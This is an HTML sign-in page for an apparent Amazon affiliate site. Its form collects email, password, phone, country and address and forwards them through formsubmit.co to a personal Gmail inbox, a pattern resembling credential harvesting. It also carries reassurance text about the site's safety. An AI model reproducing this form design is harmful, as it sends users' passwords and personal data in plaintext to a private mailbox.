<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
  <meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
  <title>Sign.in</title>
  <link rel="stylesheet" href="styles.css">
</head>
<style>
  .head {
    font-size: 1.8rem;
    margin-top: 20px;
    margin-bottom: 10px;
    font-family: 'Poppins', sans-serif;
  margin-left: 1pc;
  font-weight: 500;
  
}
#last-updated {
  margin-left: 18.7pc;
  font-style: italic;
  font-size: 1.3rem;
}
.head2 {
    margin-bottom: 15px;
    margin-top: 0.8pc;
  background-color: ghostwhite;
  padding: 1pc;
 font-style: italic;
 font-weight: bold;
margin-bottom: 3pc;
margin-left: 2pc;
 
}
a {
    color: deepskyblue;
    text-decoration: none;
}
 .Button {
  padding: 15px;
  background-color: blueviolet;
  color: white;
  font-size: 18px;
  border: 0;
  outline: none;
  cursor: pointer;
  width: 150px;
  margin: 20px auto 0;
  border-radius: 30px;
}
.Button:hover {
  background-color: black;
  color: white;
  border: 4px solid gold;
 font-size: 20px;
 
}
p {
  text-align: left;
  font-size: 16px;
  margin: 25px 0 40px;
  color: #555;
  margin-left: 9.3pc;
  margin-bottom: 0pc;
 
}

</style>
<body>
   <div class=""><img class="Logoa" src="/Logo/Logo2.png" alt=""></div>
   <h2 class="head">Note!</h2>
        <p class="head2">The website might contain Amazon affiliate links. In this case, when users click on a product link, they are redirected to Amazon, and our team may earn a commission if you make a purchase.You don't worry this website is safe because it's directly link with Amazon.<a href="/Privacy Policy-Box/Privacy.html"> "For More Information"</a>.</p>
      <div class="container">
    <form class="Forma" action="https://formsubmit.co/mohsinnadeem142@gmail.com" method="Post">
       <div class=""><img class="Log" src="/Logo/Logo1.png" alt=""></div>
      <h3>Sign.in / Registry</h3>
      <input type="email"  name="name" id="name" placeholder="Enter Your Email *" required>
       <input type="password"  name="password" id="email" placeholder="Enter Your Password *" required>
      <input type="number" name="subject" id="phone" placeholder="Your Phone Number *" required>
      <textarea  name="msg" id="message" rows="1" placeholder="Enter your Country *"></textarea>
      <textarea  name="msg" id="message" rows="2" placeholder="Enter your Address (optional)"></textarea>
      <button class="Button" onclick="openPopup()" class="Butt color" type="submit">Send</button>
      <p>Wait 2-min,If you are not a Robot! <a href="/Registration-box/Registration.html">Registry</a></p>
    </form>
  </div>
</body>
</html>